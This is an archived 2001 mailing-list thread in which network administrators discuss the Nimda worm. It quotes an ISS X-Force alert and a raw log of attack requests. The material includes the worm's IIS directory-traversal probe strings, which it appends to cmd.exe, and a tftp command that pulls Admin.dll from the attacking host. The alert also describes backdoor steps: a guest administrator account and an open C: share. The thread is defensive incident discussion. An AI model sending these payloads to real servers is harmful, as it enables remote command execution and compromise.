3) install a product on the IIS servers that performs auto-blocking of
the source IP address when Nimda or Code Red I/II is detected
Patrick
>>> LEFEVRE David <
[email protected]>
19/09/01 09:09 >>>
I've found this on an other mailling list
(Xforce)
Internet Security Systems Security Alert
September 18,
2001
Aggressive Propagation of Nimda Worm
Synopsis:
ISS
X-Force has captured a new Internet worm, known as Nimda, that
contains
much of the functionality of Code Red worm and its
derivatives. Nimda
attempts to identify vulnerable Microsoft IIS servers
and deface them,
and attempts to infect additional systems. Nimda is
potentially more
dangerous than Code Red or Code Blue, because it
includes a powerful e-mail
distribution component. Code Red was limited
to infecting Web servers
running IIS. Nimda, on the other hand, can
infect any Windows system, and
then distribute further by emailing
copies of itself to individuals in MAPI
(Messaging Application
Programming Interface) address books, or by
identifying and infecting
vulnerable IIS servers. This distinction means
that there may be
millions of infections. Indications of severe network
outages related
to the massive amount of network traffic this worm
generates have
already been reported.
Description:
Nimda is
vastly different from Code Red in how it propagates. Nimda
takes advantage
of standard e-mail distribution techniques to broaden
the eligible pool of
target hosts. Instead of only attacking Web servers
with Web server
vulnerabilities, Nimda is designed to propagate via
spoofed e-mail. The
e-mail is spoofed to appear as if it came from
trusted sources. Nimda
relies on extensive local propagation once a
system is infected. It
replaces .dll, .eml, .nws files on all shared
drives. It also appends
itself to all .htm, .html, and .asp files on
the infected system. This also
allows the worm to spread to remote
users when they access Web pages on
infected servers.
IIS Scanning and Propagation
Nimda will use
several Unicode Web Folder Traversal vulnerability attack
strings to
probe for vulnerable IIS systems. The attack strings used are
as
follows:
/scripts
/MSADC
/scripts/..%255c..
/_vti_bin/..%255c../..%255c../..%255c..
/_mem_bin/..%255c../..%255c../..%255c..
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c..
/scripts/..%c1%1c..
/scripts/..%c0%2f..
/scripts/..%c0%af..
/scripts/..%c1%9c..
/scripts/..%%35%63..
/scripts/..%%35c..
/scripts/..%25%35%63..
/scripts/..%252f..
/root.exe?/c+
(root.exe
is the backdoor that Code Red II installed on
infected
servers)
Nimda appends "/winnt/system32/cmd.exe?/c+dir" to
the end of each attack
string and inspects output to determine if the
target system is
vulnerable. If a vulnerable IIS Web server is found, Nimda
will append
the following command to an attack string to upload a copy of
the worm
to the vulnerable
server:
tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20
E-mail
Propagation
Nimda will read the e-mail address books on the infected
system. It will
e-mail a copy of itself to each address in the list.
The Subject: lines
of the e-mails containing the worm will
vary.
Backdoor Functionality
Once a computer is infected with
Nimda, the worm takes steps to
"backdoor" the infected system, by creating
accounts that could provide
further access to the system by remote
attackers. Nimda will create a
"guest" account if it doesn't already exist,
or activate it if it has
been disabled. It will also add the guest user to
the "Guests" and
"Administrators" groups.
Nimda will also open the
"C:" share to the Internet, giving full access
to the C: drive of the
infected computer. Attackers from anywhere on the
Internet may access
this share with full read/write access, once this
share is
opened.
Recommendations:
ISS RealSecure detects the Nimda worm
through the HTTP_IIS_URL_Decoding
signature. This signature was included in
Network Sensor X-Press Update
3.1 and Server Sensor 6.0.1. RealSecure
Network Sensor also detects the
Nimda worm with the HTTP_Windows_Executable
signature.
ISS BlackICE products will the trigger the "2000639 - HTTP
UTF8
backtick"
and "2002595 - IIS system32 command" events.
ISS
Internet Scanner customers can test for this vulnerability using
the
IisUnicodeTranslation check, which was included in XPU 4.4 (and
later
updated in XPU 4.8).
ISS System Scanner customers can test for
this vulnerability using the
MS00-078 check included in XPU 1.13
(#13).
ISS X-Force recommends that all users contact their anti-virus
vendor
for software updates and Nimda removal information.
Microsoft
IIS administrators who have not yet installed the patch for
the Web Server
Folder Traversal vulnerability are encouraged to do
so
immediately.
For Microsoft IIS 4.0:
http://www.microsoft.com/ntserver/nts/downloads/critical/q269862For
Microsoft IIS 5.0:
http://www.microsoft.com/windows2000/downloads/critical/q269862The
Nimda worm takes advantage of well-known security weaknesses in IIS,
as
well as a general lack of security awareness among Internet users
regarding
e-mail attachments. ISS recommends that all IIS administrators
apply
all security patches immediately and follow published Microsoft
IIS
Security Checklists. Please refer to the links in the
Additional
Information section.
Additional
Information:
ISS X-Force recommends that all Web site administrators
review the
appropriate IIS Security Checklist from Microsoft, and verify
that their
IIS Web servers have been configured securely. IIS servers
that have
been configured securely, using the Checklists, are not
vulnerable to
many of the recent and widely publicized remote IIS
exploits.
The IIS Security Checklists are available at the following
locations:
For Microsoft IIS 4.0:
http://www.microsoft.com/technet/itsolutions/security/tools/iischk.aspFor
Microsoft IIS 5.0:
http://www.microsoft.com/technet/security/iis5chk.aspWeb
site administrators are also strongly encouraged to apply the
latest
IIS cumulative security patch to prevent Web servers from
being
compromised by this and other IIS exploits. This patch is available
from
the following Microsoft Security Bulletin:
http://www.microsoft.com/technet/security/bulletin/MS01-044.asp______
About
Internet Security Systems (ISS)
Internet Security Systems is a leading
global provider of security
management solutions for the Internet,
protecting digital assets and
ensuring safe and uninterrupted e-business.
With its industry-leading
intrusion detection and vulnerability assessment,
remote managed
security services, and strategic consulting and education
offerings, ISS
is a trusted security provider to more than 8,000
customers worldwide
including 21 of the 25 largest U.S. commercial banks
and the top 10 U.S.
telecommunications companies. Founded in 1994, ISS
is headquartered in
Atlanta, GA, with additional offices throughout North
America and
international operations in Asia, Australia, Europe, Latin
America and
the Middle East. For more information, visit the Internet
Security
Systems web site at
www.iss.net
or call.
Copyright (c) 2001 Internet Security Systems,
Inc.
Permission is hereby granted for the redistribution of this
Alert
electronically. It is not to be edited in any way without
express
consent of the X-Force. If you wish to reprint the whole or any
part
of this Alert in any other medium excluding electronic medium,
please
e-mail
[email protected] for permission.
Disclaimer
The
information within this paper may change without notice. Use of
this
information constitutes acceptance for use in an AS IS condition.
There are
NO warranties with regard to this information. In no event
shall the author
be liable for any damages whatsoever arising out of or
in connection with
the use or spread of this information. Any use of
this information is at
the user's own risk.
X-Force PGP Key available at:
http://xforce.iss.net/sensitive.phpas
well as on MIT's PGP key server and PGP.com's key server.
Please send
suggestions, updates, and comments to: X-Force
[email protected] of Internet
Security Systems, Inc.
Best regards,
David
Patrick Coomans
wrote:
> Since this evening I am experiencing massive attacks
on HTTP (IIS
> oriented I presume) from many different IP addresses.
They all look
> like: GET
>
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>
HTTP/1.0
> GET /scripts/root.exe?/c+dir HTTP/1.0
> GET
/MSADC/root.exe?/c+dir HTTP/1.0
> GET /MSADC/root.exe?/c+dir
HTTP/1.0
> GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET
>
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>
HTTP/1.0
> GET
>
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>
HTTP/1.0
> GET
>
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>
HTTP/1.0
> GET
>
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
>
HTTP/1.0
> GET
>
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
>
HTTP/1.0
> GET
>
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
>
HTTP/1.0
> GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0
> GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
HTTP/1.0
> GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
HTTP/1.0
> GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0
> GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
HTTP/1.0
> GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
HTTP/1.0
> GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0
> GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
HTTP/1.0
> GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
HTTP/1.0
> GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir
HTTP/1.0
> GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Is
> anyone aware that this is some new kind of worm?Now my FW1
question:
> can I create a HTTP resource (secure server) that blocks all
requests
> that e.g. have a .EXE in it ? Or would that slow my
FW1's down to
> much? Any other suggestions for good products that can
do HTTP content
> inspection and that cooperate or can co-exist with
fw1
> ? Thanks,Patrick
--
David LEFEVRE
CARDIF -
Architecture et Sécurité Opérationnelle
[email protected] - Tél : 01
41 42 76 63
[email protected] - Tel : 01 41 42 24
22